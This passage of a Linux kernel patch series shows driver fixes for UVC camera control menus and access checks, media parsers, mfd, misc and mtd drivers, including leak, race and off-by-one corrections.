+ 	if (__uvc_query_v4l2_class(chain, v4l2_id, 0) >= 0)
+ 		return -EACCES;
+@@ -1104,6 +1146,29 @@ int uvc_ctrl_is_accessible(struct uvc_video_chain *chain, u32 v4l2_id,
+ 	if (!(ctrl->info.flags & UVC_CTRL_FLAG_SET_CUR) && !read)
+ 		return -EACCES;
+ 
++	if (ioctl != VIDIOC_S_EXT_CTRLS || !mapping->master_id)
++		return 0;
++
++	/*
++	 * Iterate backwards in cases where the master control is accessed
++	 * multiple times in the same ioctl. We want the last value.
++	 */
++	for (i = ctrls->count - 1; i >= 0; i--) {
++		if (ctrls->controls[i].id == mapping->master_id)
++			return ctrls->controls[i].value ==
++					mapping->master_manual ? 0 : -EACCES;
++	}
++
++	__uvc_find_control(ctrl->entity, mapping->master_id, &master_map,
++			   &master_ctrl, 0);
++
++	if (!master_ctrl || !(master_ctrl->info.flags & UVC_CTRL_FLAG_GET_CUR))
++		return 0;
++
++	ret = __uvc_ctrl_get(chain, master_ctrl, master_map, &val);
++	if (ret >= 0 && val != mapping->master_manual)
++		return -EACCES;
++
+ 	return 0;
+ }
+ 
+@@ -1169,12 +1234,14 @@ static int __uvc_query_v4l2_ctrl(struct uvc_video_chain *chain,
+ 
+ 	switch (mapping->v4l2_type) {
+ 	case V4L2_CTRL_TYPE_MENU:
+-		v4l2_ctrl->minimum = 0;
+-		v4l2_ctrl->maximum = mapping->menu_count - 1;
++		v4l2_ctrl->minimum = ffs(mapping->menu_mask) - 1;
++		v4l2_ctrl->maximum = fls(mapping->menu_mask) - 1;
+ 		v4l2_ctrl->step = 1;
+ 
+ 		menu = mapping->menu_info;
+-		for (i = 0; i < mapping->menu_count; ++i, ++menu) {
++		for (i = 0; BIT(i) <= mapping->menu_mask; ++i, ++menu) {
++			if (!test_bit(i, &mapping->menu_mask))
++				continue;
+ 			if (menu->value == v4l2_ctrl->default_value) {
+ 				v4l2_ctrl->default_value = i;
+ 				break;
+@@ -1289,7 +1356,7 @@ int uvc_query_v4l2_menu(struct uvc_video_chain *chain,
+ 		goto done;
+ 	}
+ 
+-	if (query_menu->index >= mapping->menu_count) {
++	if (!test_bit(query_menu->index, &mapping->menu_mask)) {
+ 		ret = -EINVAL;
+ 		goto done;
+ 	}
+@@ -1797,8 +1864,13 @@ int uvc_ctrl_set(struct uvc_fh *handle,
+ 		break;
+ 
+ 	case V4L2_CTRL_TYPE_MENU:
+-		if (xctrl->value < 0 || xctrl->value >= mapping->menu_count)
++		if (xctrl->value < (ffs(mapping->menu_mask) - 1) ||
++		    xctrl->value > (fls(mapping->menu_mask) - 1))
+ 			return -ERANGE;
++
++		if (!test_bit(xctrl->value, &mapping->menu_mask))
++			return -EINVAL;
++
+ 		value = mapping->menu_info[xctrl->value].value;
+ 
+ 		/*
+@@ -2237,7 +2309,7 @@ static int __uvc_ctrl_add_mapping(struct uvc_video_chain *chain,
+ 
+ 	INIT_LIST_HEAD(&map->ev_subs);
+ 
+-	size = sizeof(*mapping->menu_info) * mapping->menu_count;
++	size = sizeof(*mapping->menu_info) * fls(mapping->menu_mask);
+ 	map->menu_info = kmemdup(mapping->menu_info, size, GFP_KERNEL);
+ 	if (map->menu_info == NULL) {
+ 		kfree(map->name);
+@@ -2421,8 +2493,7 @@ static void uvc_ctrl_prune_entity(struct uvc_device *dev,
+ static void uvc_ctrl_init_ctrl(struct uvc_video_chain *chain,
+ 			       struct uvc_control *ctrl)
+ {
+-	const struct uvc_control_mapping *mappings;
+-	unsigned int num_mappings;
++	const struct uvc_control_mapping **mappings;
+ 	unsigned int i;
+ 
+ 	/*
+@@ -2489,16 +2560,11 @@ static void uvc_ctrl_init_ctrl(struct uvc_video_chain *chain,
+ 	}
+ 
+ 	/* Finally process version-specific mappings. */
+-	if (chain->dev->uvc_version < 0x0150) {
+-		mappings = uvc_ctrl_mappings_uvc11;
+-		num_mappings = ARRAY_SIZE(uvc_ctrl_mappings_uvc11);
+-	} else {
+-		mappings = uvc_ctrl_mappings_uvc15;
+-		num_mappings = ARRAY_SIZE(uvc_ctrl_mappings_uvc15);
+-	}
++	mappings = chain->dev->uvc_version < 0x0150
++		 ? uvc_ctrl_mappings_uvc11 : uvc_ctrl_mappings_uvc15;
+ 
+-	for (i = 0; i < num_mappings; ++i) {
+-		const struct uvc_control_mapping *mapping = &mappings[i];
++	for (i = 0; mappings[i]; ++i) {
++		const struct uvc_control_mapping *mapping = mappings[i];
+ 
+ 		if (uvc_entity_match_guid(ctrl->entity, mapping->entity) &&
+ 		    ctrl->info.selector == mapping->selector)
+diff --git a/drivers/media/usb/uvc/uvc_driver.c b/drivers/media/usb/uvc/uvc_driver.c
+index e4bcb50113607..d5ff8df20f18a 100644
+--- a/drivers/media/usb/uvc/uvc_driver.c
++++ b/drivers/media/usb/uvc/uvc_driver.c
+@@ -7,6 +7,7 @@
+  */
+ 
+ #include <linux/atomic.h>
++#include <linux/bits.h>
+ #include <linux/gpio/consumer.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+@@ -2370,23 +2371,6 @@ MODULE_PARM_DESC(timeout, "Streaming control requests timeout");
+  * Driver initialization and cleanup
+  */
+ 
+-static const struct uvc_menu_info power_line_frequency_controls_limited[] = {
+-	{ 1, "50 Hz" },
+-	{ 2, "60 Hz" },
+-};
+-
+-static const struct uvc_control_mapping uvc_ctrl_power_line_mapping_limited = {
+-	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
+-	.entity		= UVC_GUID_UVC_PROCESSING,
+-	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
+-	.size		= 2,
+-	.offset		= 0,
+-	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+-	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
+-	.menu_info	= power_line_frequency_controls_limited,
+-	.menu_count	= ARRAY_SIZE(power_line_frequency_controls_limited),
+-};
+-
+ static const struct uvc_device_info uvc_ctrl_power_line_limited = {
+ 	.mappings = (const struct uvc_control_mapping *[]) {
+ 		&uvc_ctrl_power_line_mapping_limited,
+diff --git a/drivers/media/usb/uvc/uvc_v4l2.c b/drivers/media/usb/uvc/uvc_v4l2.c
+index f4d4c33b6dfbd..0774a11360c03 100644
+--- a/drivers/media/usb/uvc/uvc_v4l2.c
++++ b/drivers/media/usb/uvc/uvc_v4l2.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <linux/bits.h>
+ #include <linux/compat.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+@@ -80,7 +81,7 @@ static int uvc_ioctl_ctrl_map(struct uvc_video_chain *chain,
+ 			goto free_map;
+ 		}
+ 
+-		map->menu_count = xmap->menu_count;
++		map->menu_mask = GENMASK(xmap->menu_count - 1, 0);
+ 		break;
+ 
+ 	default:
+@@ -1020,8 +1021,7 @@ static int uvc_ctrl_check_access(struct uvc_video_chain *chain,
+ 	int ret = 0;
+ 
+ 	for (i = 0; i < ctrls->count; ++ctrl, ++i) {
+-		ret = uvc_ctrl_is_accessible(chain, ctrl->id,
+-					    ioctl == VIDIOC_G_EXT_CTRLS);
++		ret = uvc_ctrl_is_accessible(chain, ctrl->id, ctrls, ioctl);
+ 		if (ret)
+ 			break;
+ 	}
+diff --git a/drivers/media/usb/uvc/uvcvideo.h b/drivers/media/usb/uvc/uvcvideo.h
+index df93db259312e..1227ae63f85b7 100644
+--- a/drivers/media/usb/uvc/uvcvideo.h
++++ b/drivers/media/usb/uvc/uvcvideo.h
+@@ -117,7 +117,7 @@ struct uvc_control_mapping {
+ 	u32 data_type;
+ 
+ 	const struct uvc_menu_info *menu_info;
+-	u32 menu_count;
++	unsigned long menu_mask;
+ 
+ 	u32 master_id;
+ 	s32 master_manual;
+@@ -728,6 +728,7 @@ int uvc_status_start(struct uvc_device *dev, gfp_t flags);
+ void uvc_status_stop(struct uvc_device *dev);
+ 
+ /* Controls */
++extern const struct uvc_control_mapping uvc_ctrl_power_line_mapping_limited;
+ extern const struct v4l2_subscribed_event_ops uvc_ctrl_sub_ev_ops;
+ 
+ int uvc_query_v4l2_ctrl(struct uvc_video_chain *chain,
+@@ -761,7 +762,8 @@ static inline int uvc_ctrl_rollback(struct uvc_fh *handle)
+ int uvc_ctrl_get(struct uvc_video_chain *chain, struct v4l2_ext_control *xctrl);
+ int uvc_ctrl_set(struct uvc_fh *handle, struct v4l2_ext_control *xctrl);
+ int uvc_ctrl_is_accessible(struct uvc_video_chain *chain, u32 v4l2_id,
+-			   bool read);
++			   const struct v4l2_ext_controls *ctrls,
++			   unsigned long ioctl);
+ 
+ int uvc_xu_ctrl_query(struct uvc_video_chain *chain,
+ 		      struct uvc_xu_control_query *xqry);
+diff --git a/drivers/media/v4l2-core/v4l2-h264.c b/drivers/media/v4l2-core/v4l2-h264.c
+index 72bd64f651981..c00197d095e75 100644
+--- a/drivers/media/v4l2-core/v4l2-h264.c
++++ b/drivers/media/v4l2-core/v4l2-h264.c
+@@ -305,6 +305,8 @@ static const char *format_ref_list_p(const struct v4l2_h264_reflist_builder *bui
+ 	int n = 0, i;
+ 
+ 	*out_str = kmalloc(tmp_str_size, GFP_KERNEL);
++	if (!(*out_str))
++		return NULL;
+ 
+ 	n += snprintf(*out_str + n, tmp_str_size - n, "|");
+ 
+@@ -343,6 +345,8 @@ static const char *format_ref_list_b(const struct v4l2_h264_reflist_builder *bui
+ 	int n = 0, i;
+ 
+ 	*out_str = kmalloc(tmp_str_size, GFP_KERNEL);
++	if (!(*out_str))
++		return NULL;
+ 
+ 	n += snprintf(*out_str + n, tmp_str_size - n, "|");
+ 
+diff --git a/drivers/media/v4l2-core/v4l2-jpeg.c b/drivers/media/v4l2-core/v4l2-jpeg.c
+index c2513b775f6a7..94435a7b68169 100644
+--- a/drivers/media/v4l2-core/v4l2-jpeg.c
++++ b/drivers/media/v4l2-core/v4l2-jpeg.c
+@@ -460,7 +460,7 @@ static int jpeg_parse_app14_data(struct jpeg_stream *stream,
+ 	/* Check for "Adobe\0" in Ap1..6 */
+ 	if (stream->curr + 6 > stream->end ||
+ 	    strncmp(stream->curr, "Adobe\0", 6))
+-		return -EINVAL;
++		return jpeg_skip(stream, lp - 2);
+ 
+ 	/* get to Ap12 */
+ 	ret = jpeg_skip(stream, 11);
+@@ -474,7 +474,7 @@ static int jpeg_parse_app14_data(struct jpeg_stream *stream,
+ 	*tf = ret;
+ 
+ 	/* skip the rest of the segment, this ensures at least it is complete */
+-	skip = lp - 2 - 11;
++	skip = lp - 2 - 11 - 1;
+ 	return jpeg_skip(stream, skip);
+ }
+ 
+diff --git a/drivers/mfd/Kconfig b/drivers/mfd/Kconfig
+index 30db49f318668..7ed31fbd8c7fa 100644
+--- a/drivers/mfd/Kconfig
++++ b/drivers/mfd/Kconfig
+@@ -15,6 +15,7 @@ config MFD_CS5535
+ 	tristate "AMD CS5535 and CS5536 southbridge core functions"
+ 	select MFD_CORE
+ 	depends on PCI && (X86_32 || (X86 && COMPILE_TEST))
++	depends on !UML
+ 	help
+ 	  This is the core driver for CS5535/CS5536 MFD functions.  This is
+ 	  necessary for using the board's GPIO and MFGPT functionality.
+diff --git a/drivers/mfd/pcf50633-adc.c b/drivers/mfd/pcf50633-adc.c
+index 5cd653e615125..191b1bc6141c2 100644
+--- a/drivers/mfd/pcf50633-adc.c
++++ b/drivers/mfd/pcf50633-adc.c
+@@ -136,6 +136,7 @@ int pcf50633_adc_async_read(struct pcf50633 *pcf, int mux, int avg,
+ 			     void *callback_param)
+ {
+ 	struct pcf50633_adc_request *req;
++	int ret;
+ 
+ 	/* req is freed when the result is ready, in interrupt handler */
+ 	req = kmalloc(sizeof(*req), GFP_KERNEL);
+@@ -147,7 +148,11 @@ int pcf50633_adc_async_read(struct pcf50633 *pcf, int mux, int avg,
+ 	req->callback = callback;
+ 	req->callback_param = callback_param;
+ 
+-	return adc_enqueue_request(pcf, req);
++	ret = adc_enqueue_request(pcf, req);
++	if (ret)
++		kfree(req);
++
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(pcf50633_adc_async_read);
+ 
+diff --git a/drivers/mfd/rk808.c b/drivers/mfd/rk808.c
+index f44fc3f080a8e..0f22ef61e8170 100644
+--- a/drivers/mfd/rk808.c
++++ b/drivers/mfd/rk808.c
+@@ -189,6 +189,7 @@ static const struct mfd_cell rk817s[] = {
+ };
+ 
+ static const struct mfd_cell rk818s[] = {
++	{ .name = "rk808-clkout", .id = PLATFORM_DEVID_NONE, },
+ 	{ .name = "rk808-regulator", .id = PLATFORM_DEVID_NONE, },
+ 	{
+ 		.name = "rk808-rtc",
+diff --git a/drivers/misc/eeprom/idt_89hpesx.c b/drivers/misc/eeprom/idt_89hpesx.c
+index 4e07ee9cb500e..7075d0b378811 100644
+--- a/drivers/misc/eeprom/idt_89hpesx.c
++++ b/drivers/misc/eeprom/idt_89hpesx.c
+@@ -1566,12 +1566,20 @@ static struct i2c_driver idt_driver = {
+  */
+ static int __init idt_init(void)
+ {
++	int ret;
++
+ 	/* Create Debugfs directory first */
+ 	if (debugfs_initialized())
+ 		csr_dbgdir = debugfs_create_dir("idt_csr", NULL);
+ 
+ 	/* Add new i2c-device driver */
+-	return i2c_add_driver(&idt_driver);
++	ret = i2c_add_driver(&idt_driver);
++	if (ret) {
++		debugfs_remove_recursive(csr_dbgdir);
++		return ret;
++	}
++
++	return 0;
+ }
+ module_init(idt_init);
+ 
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 5310606113fe5..7ccaca1b7cb8b 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -2315,7 +2315,18 @@ static int fastrpc_rpmsg_probe(struct rpmsg_device *rpdev)
+ 	data->domain_id = domain_id;
+ 	data->rpdev = rpdev;
+ 
+-	return of_platform_populate(rdev->of_node, NULL, NULL, rdev);
++	err = of_platform_populate(rdev->of_node, NULL, NULL, rdev);
++	if (err)
++		goto populate_error;
++
++	return 0;
++
++populate_error:
++	if (data->fdevice)
++		misc_deregister(&data->fdevice->miscdev);
++	if (data->secure_fdevice)
++		misc_deregister(&data->secure_fdevice->miscdev);
++
+ fdev_error:
+ 	kfree(data);
+ 	return err;
+diff --git a/drivers/misc/habanalabs/common/command_submission.c b/drivers/misc/habanalabs/common/command_submission.c
+index ea0e5101c10ed..6367cbea4ca2a 100644
+--- a/drivers/misc/habanalabs/common/command_submission.c
++++ b/drivers/misc/habanalabs/common/command_submission.c
+@@ -3119,19 +3119,18 @@ start_over:
+ 			goto start_over;
+ 		}
+ 	} else {
++		/* Fill up the new registration node info */
++		requested_offset_record->ts_reg_info.buf = buf;
++		requested_offset_record->ts_reg_info.cq_cb = cq_cb;
++		requested_offset_record->ts_reg_info.timestamp_kernel_addr =
++				(u64 *) ts_buff->user_buff_address + ts_offset;
++		requested_offset_record->cq_kernel_addr =
++				(u64 *) cq_cb->kernel_address + cq_offset;
++		requested_offset_record->cq_target_value = target_value;
++
+ 		spin_unlock_irqrestore(wait_list_lock, flags);
+ 	}
+ 
+-	/* Fill up the new registration node info */
+-	requested_offset_record->ts_reg_info.in_use = 1;
+-	requested_offset_record->ts_reg_info.buf = buf;
+-	requested_offset_record->ts_reg_info.cq_cb = cq_cb;
+-	requested_offset_record->ts_reg_info.timestamp_kernel_addr =
+-			(u64 *) ts_buff->user_buff_address + ts_offset;
+-	requested_offset_record->cq_kernel_addr =
+-			(u64 *) cq_cb->kernel_address + cq_offset;
+-	requested_offset_record->cq_target_value = target_value;
+-
+ 	*pend = requested_offset_record;
+ 
+ 	dev_dbg(buf->mmg->dev, "Found available node in TS kernel CB %p\n",
+@@ -3179,7 +3178,7 @@ static int _hl_interrupt_wait_ioctl(struct hl_device *hdev, struct hl_ctx *ctx,
+ 			goto put_cq_cb;
+ 		}
+ 
+-		/* Find first available record */
++		/* get ts buffer record */
+ 		rc = ts_buff_get_kernel_ts_record(buf, cq_cb, ts_offset,
+ 						cq_counters_offset, target_value,
+ 						&interrupt->wait_list_lock, &pend);
+@@ -3227,7 +3226,19 @@ static int _hl_interrupt_wait_ioctl(struct hl_device *hdev, struct hl_ctx *ctx,
+ 	 * Note that we cannot have sorted list by target value,
+ 	 * in order to shorten the list pass loop, since
+ 	 * same list could have nodes for different cq counter handle.
++	 * Note:
++	 * Mark the ts buff offset as in use here, inside the spinlock-protected
++	 * area, to avoid reaching the re-use section in ts_buff_get_kernel_ts_record
++	 * before the node is added to the list. This scenario might happen when
++	 * multiple threads race on the same offset: one thread could set the
++	 * ts buff in ts_buff_get_kernel_ts_record, then another thread could take
++	 * over, get to ts_buff_get_kernel_ts_record, and then we would try to
++	 * re-use the same ts buff offset and delete a non-existing node from
++	 * the list.
+ 	 */
++	if (register_ts_record)
++		pend->ts_reg_info.in_use = 1;
++
+ 	list_add_tail(&pend->wait_list_node, &interrupt->wait_list_head);
+ 	spin_unlock_irqrestore(&interrupt->wait_list_lock, flags);
+ 
+diff --git a/drivers/misc/habanalabs/common/device.c b/drivers/misc/habanalabs/common/device.c
+index 87ab329e65d49..f7b9c3871518b 100644
+--- a/drivers/misc/habanalabs/common/device.c
++++ b/drivers/misc/habanalabs/common/device.c
+@@ -1566,7 +1566,8 @@ kill_processes:
+ 		if (rc == -EBUSY) {
+ 			if (hdev->device_fini_pending) {
+ 				dev_crit(hdev->dev,
+-					"Failed to kill all open processes, stopping hard reset\n");
++					"%s Failed to kill all open processes, stopping hard reset\n",
++					dev_name(&(hdev)->pdev->dev));
+ 				goto out_err;
+ 			}
+ 
+@@ -1576,7 +1577,8 @@ kill_processes:
+ 
+ 		if (rc) {
+ 			dev_crit(hdev->dev,
+-				"Failed to kill all open processes, stopping hard reset\n");
++				"%s Failed to kill all open processes, stopping hard reset\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			goto out_err;
+ 		}
+ 
+@@ -1627,14 +1629,16 @@ kill_processes:
+ 			 * ensure driver puts the driver in a unusable state
+ 			 */
+ 			dev_crit(hdev->dev,
+-				"Consecutive FW fatal errors received, stopping hard reset\n");
++				"%s Consecutive FW fatal errors received, stopping hard reset\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			rc = -EIO;
+ 			goto out_err;
+ 		}
+ 
+ 		if (hdev->kernel_ctx) {
+ 			dev_crit(hdev->dev,
+-				"kernel ctx was alive during hard reset, something is terribly wrong\n");
++				"%s kernel ctx was alive during hard reset, something is terribly wrong\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			rc = -EBUSY;
+ 			goto out_err;
+ 		}
+@@ -1752,9 +1756,13 @@ kill_processes:
+ 	hdev->reset_info.needs_reset = false;
+ 
+ 	if (hard_reset)
+-		dev_info(hdev->dev, "Successfully finished resetting the device\n");
++		dev_info(hdev->dev,
++			 "Successfully finished resetting the %s device\n",
++			 dev_name(&(hdev)->pdev->dev));
+ 	else
+-		dev_dbg(hdev->dev, "Successfully finished resetting the device\n");
++		dev_dbg(hdev->dev,
++			"Successfully finished resetting the %s device\n",
++			dev_name(&(hdev)->pdev->dev));
+ 
+ 	if (hard_reset) {
+ 		hdev->reset_info.hard_reset_cnt++;
+@@ -1789,7 +1797,9 @@ out_err:
+ 	hdev->reset_info.in_compute_reset = 0;
+ 
+ 	if (hard_reset) {
+-		dev_err(hdev->dev, "Failed to reset! Device is NOT usable\n");
++		dev_err(hdev->dev,
++			"%s Failed to reset! Device is NOT usable\n",
++			dev_name(&(hdev)->pdev->dev));
+ 		hdev->reset_info.hard_reset_cnt++;
+ 	} else if (reset_upon_device_release) {
+ 		spin_unlock(&hdev->reset_info.lock);
+@@ -2186,7 +2196,8 @@ int hl_device_init(struct hl_device *hdev, struct class *hclass)
+ 	}
+ 
+ 	dev_notice(hdev->dev,
+-		"Successfully added device to habanalabs driver\n");
++		"Successfully added device %s to habanalabs driver\n",
++		dev_name(&(hdev)->pdev->dev));
+ 
+ 	hdev->init_done = true;
+ 
+@@ -2235,11 +2246,11 @@ out_disabled:
+ 		device_cdev_sysfs_add(hdev);
+ 	if (hdev->pdev)
+ 		dev_err(&hdev->pdev->dev,
+-			"Failed to initialize hl%d. Device is NOT usable !\n",
+-			hdev->cdev_idx);
++			"Failed to initialize hl%d. Device %s is NOT usable !\n",
++			hdev->cdev_idx, dev_name(&(hdev)->pdev->dev));
+ 	else
+-		pr_err("Failed to initialize hl%d. Device is NOT usable !\n",
+-			hdev->cdev_idx);
++		pr_err("Failed to initialize hl%d. Device %s is NOT usable !\n",
++			hdev->cdev_idx, dev_name(&(hdev)->pdev->dev));
+ 
+ 	return rc;
+ }
+@@ -2295,7 +2306,8 @@ void hl_device_fini(struct hl_device *hdev)
+ 
+ 		if (ktime_compare(ktime_get(), timeout) > 0) {
+ 			dev_crit(hdev->dev,
+-				"Failed to remove device because reset function did not finish\n");
++				"%s Failed to remove device because reset function did not finish\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			return;
+ 		}
+ 	}
+diff --git a/drivers/misc/habanalabs/common/memory.c b/drivers/misc/habanalabs/common/memory.c
+index 5e9ae7600d75e..047306e33baad 100644
+--- a/drivers/misc/habanalabs/common/memory.c
++++ b/drivers/misc/habanalabs/common/memory.c
+@@ -2089,12 +2089,13 @@ static int hl_ts_mmap(struct hl_mmap_mem_buf *buf, struct vm_area_struct *vma, v
+ static int hl_ts_alloc_buf(struct hl_mmap_mem_buf *buf, gfp_t gfp, void *args)
+ {
+ 	struct hl_ts_buff *ts_buff = NULL;
+-	u32 size, num_elements;
++	u32 num_elements;
++	size_t size;
+ 	void *p;
+ 
+ 	num_elements = *(u32 *)args;
+ 
+-	ts_buff = kzalloc(sizeof(*ts_buff), GFP_KERNEL);
++	ts_buff = kzalloc(sizeof(*ts_buff), gfp);
+ 	if (!ts_buff)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/misc/mei/hdcp/mei_hdcp.c b/drivers/misc/mei/hdcp/mei_hdcp.c
+index e889a8bd7ac88..e0dcd5c114db1 100644
+--- a/drivers/misc/mei/hdcp/mei_hdcp.c
++++ b/drivers/misc/mei/hdcp/mei_hdcp.c
+@@ -859,8 +859,8 @@ static void mei_hdcp_remove(struct mei_cl_device *cldev)
+ 		dev_warn(&cldev->dev, "mei_cldev_disable() failed\n");
+ }
+ 
+-#define MEI_UUID_HDCP GUID_INIT(0xB638AB7E, 0x94E2, 0x4EA2, 0xA5, \
+-				0x52, 0xD1, 0xC5, 0x4B, 0x62, 0x7F, 0x04)
++#define MEI_UUID_HDCP UUID_LE(0xB638AB7E, 0x94E2, 0x4EA2, 0xA5, \
++			      0x52, 0xD1, 0xC5, 0x4B, 0x62, 0x7F, 0x04)
+ 
+ static const struct mei_cl_device_id mei_hdcp_tbl[] = {
+ 	{ .uuid = MEI_UUID_HDCP, .version = MEI_CL_VERSION_ANY },
+diff --git a/drivers/misc/mei/pxp/mei_pxp.c b/drivers/misc/mei/pxp/mei_pxp.c
+index 8dd09b1722ebd..7ee1fa7b1cb31 100644
+--- a/drivers/misc/mei/pxp/mei_pxp.c
++++ b/drivers/misc/mei/pxp/mei_pxp.c
+@@ -238,8 +238,8 @@ static void mei_pxp_remove(struct mei_cl_device *cldev)
+ }
+ 
+ /* fbf6fcf1-96cf-4e2e-a6a6-1bab8cbe36b1 : PAVP GUID*/
+-#define MEI_GUID_PXP GUID_INIT(0xfbf6fcf1, 0x96cf, 0x4e2e, 0xA6, \
+-			       0xa6, 0x1b, 0xab, 0x8c, 0xbe, 0x36, 0xb1)
++#define MEI_GUID_PXP UUID_LE(0xfbf6fcf1, 0x96cf, 0x4e2e, 0xA6, \
++			     0xa6, 0x1b, 0xab, 0x8c, 0xbe, 0x36, 0xb1)
+ 
+ static struct mei_cl_device_id mei_pxp_tbl[] = {
+ 	{ .uuid = MEI_GUID_PXP, .version = MEI_CL_VERSION_ANY },
+diff --git a/drivers/misc/vmw_vmci/vmci_host.c b/drivers/misc/vmw_vmci/vmci_host.c
+index da1e2a773823e..857b9851402a6 100644
+--- a/drivers/misc/vmw_vmci/vmci_host.c
++++ b/drivers/misc/vmw_vmci/vmci_host.c
+@@ -242,6 +242,8 @@ static int vmci_host_setup_notify(struct vmci_ctx *context,
+ 		context->notify_page = NULL;
+ 		return VMCI_ERROR_GENERIC;
+ 	}
++	if (context->notify_page == NULL)
++		return VMCI_ERROR_UNAVAILABLE;
+ 
+ 	/*
+ 	 * Map the locked page and set up notify pointer.
+diff --git a/drivers/mtd/mtdpart.c b/drivers/mtd/mtdpart.c
+index d442fa94c8720..85f5ee6f06fc6 100644
+--- a/drivers/mtd/mtdpart.c
++++ b/drivers/mtd/mtdpart.c
+@@ -577,6 +577,7 @@ static int mtd_part_of_parse(struct mtd_info *master,
+ {
+ 	struct mtd_part_parser *parser;
+ 	struct device_node *np;
++	struct device_node *child;
+ 	struct property *prop;
+ 	struct device *dev;
+ 	const char *compat;
+@@ -594,6 +595,15 @@ static int mtd_part_of_parse(struct mtd_info *master,
+ 	else
+ 		np = of_get_child_by_name(np, "partitions");
+ 
++	/*
++	 * Don't create devices that are added to a bus but will never get
++	 * probed. That'll cause fw_devlink to block probing of consumers of
++	 * this partition until the partition device is probed.
++	 */
++	for_each_child_of_node(np, child)
++		if (of_device_is_compatible(child, "nvmem-cells"))
++			of_node_set_flag(child, OF_POPULATED);
++
+ 	of_property_for_each_string(np, "compatible", prop, compat) {
+ 		parser = mtd_part_get_compatible_parser(compat);
+ 		if (!parser)
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index d67c926bca8ba..2ef2660f58180 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -2026,6 +2026,15 @@ void spi_nor_set_erase_type(struct spi_nor_erase_type *erase, u32 size,
+ 	erase->size_mask = (1 << erase->size_shift) - 1;
+ }
+ 
++/**
++ * spi_nor_mask_erase_type() - mask out a SPI NOR erase type
++ * @erase:	pointer to a structure that describes a SPI NOR erase type
++ */
++void spi_nor_mask_erase_type(struct spi_nor_erase_type *erase)
++{
++	erase->size = 0;
++}
++
+ /**
+  * spi_nor_init_uniform_erase_map() - Initialize uniform erase map
+  * @map:		the erase map of the SPI NOR
+diff --git a/drivers/mtd/spi-nor/core.h b/drivers/mtd/spi-nor/core.h
+index f03b55cf7e6fe..958cd143c9346 100644
+--- a/drivers/mtd/spi-nor/core.h
++++ b/drivers/mtd/spi-nor/core.h
+@@ -684,6 +684,7 @@ void spi_nor_set_pp_settings(struct spi_nor_pp_command *pp, u8 opcode,
+ 
+ void spi_nor_set_erase_type(struct spi_nor_erase_type *erase, u32 size,
+ 			    u8 opcode);
++void spi_nor_mask_erase_type(struct spi_nor_erase_type *erase);
+ struct spi_nor_erase_region *
+ spi_nor_region_next(struct spi_nor_erase_region *region);
+ void spi_nor_init_uniform_erase_map(struct spi_nor_erase_map *map,
+diff --git a/drivers/mtd/spi-nor/sfdp.c b/drivers/mtd/spi-nor/sfdp.c
+index 8434f654eca1e..223906606ecb5 100644
+--- a/drivers/mtd/spi-nor/sfdp.c
++++ b/drivers/mtd/spi-nor/sfdp.c
+@@ -875,7 +875,7 @@ static int spi_nor_init_non_uniform_erase_map(struct spi_nor *nor,
+ 	 */
+ 	for (i = 0; i < SNOR_ERASE_TYPE_MAX; i++)
+ 		if (!(regions_erase_type & BIT(erase[i].idx)))
+-			spi_nor_set_erase_type(&erase[i], 0, 0xFF);
++			spi_nor_mask_erase_type(&erase[i]);
+ 
+ 	return 0;
+ }
+@@ -1089,7 +1089,7 @@ static int spi_nor_parse_4bait(struct spi_nor *nor,
+ 			erase_type[i].opcode = (dwords[1] >>
+ 						erase_type[i].idx * 8) & 0xFF;
+ 		else
+-			spi_nor_set_erase_type(&erase_type[i], 0u, 0xFF);
++			spi_nor_mask_erase_type(&erase_type[i]);
+ 	}
+ 
+ 	/*
+@@ -1228,7 +1228,7 @@ static int spi_nor_parse_sccr(struct spi_nor *nor,
+ 
+ 	le32_to_cpu_array(dwords, sccr_header->length);
+ 
+-	if (FIELD_GET(SCCR_DWORD22_OCTAL_DTR_EN_VOLATILE, dwords[22]))
++	if (FIELD_GET(SCCR_DWORD22_OCTAL_DTR_EN_VOLATILE, dwords[21]))
+ 		nor->flags |= SNOR_F_IO_MODE_EN_VOLATILE;
+ 
+ out:
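The one-character change above (dwords[22] to dwords[21]) is the classic mismatch between a 1-based specification and a 0-based array: JESD216 numbers the SCCR DWORDs from 1, so the spec's 22nd DWORD lives at index 21. A small standalone illustration of the convention (the helper name is hypothetical):

#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Spec-style tables number DWORDs from 1; C arrays index from 0,
 * so "DWORD n" is dwords[n - 1]. */
static uint32_t spec_dword(const uint32_t *dwords, unsigned int n)
{
	return dwords[n - 1];
}

int main(void)
{
	uint32_t dwords[22] = { 0 };

	dwords[21] = 1u << 31;	/* a flag in the spec's "DWORD 22" */

	/* dwords[22] would read one element past the end of the array;
	 * spec_dword(dwords, 22) fetches the intended element. */
	printf("DWORD 22 = 0x%08" PRIx32 "\n", spec_dword(dwords, 22));
	return 0;
}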
+diff --git a/drivers/mtd/spi-nor/spansion.c b/drivers/mtd/spi-nor/spansion.c
+index b621cdfd506fd..07fe0f6fdfe3e 100644
+--- a/drivers/mtd/spi-nor/spansion.c
++++ b/drivers/mtd/spi-nor/spansion.c
+@@ -21,8 +21,13 @@
+ #define SPINOR_REG_CYPRESS_CFR3V		0x00800004
+ #define SPINOR_REG_CYPRESS_CFR3V_PGSZ		BIT(4) /* Page size. */
+ #define SPINOR_REG_CYPRESS_CFR5V		0x00800006
+-#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_EN	0x3
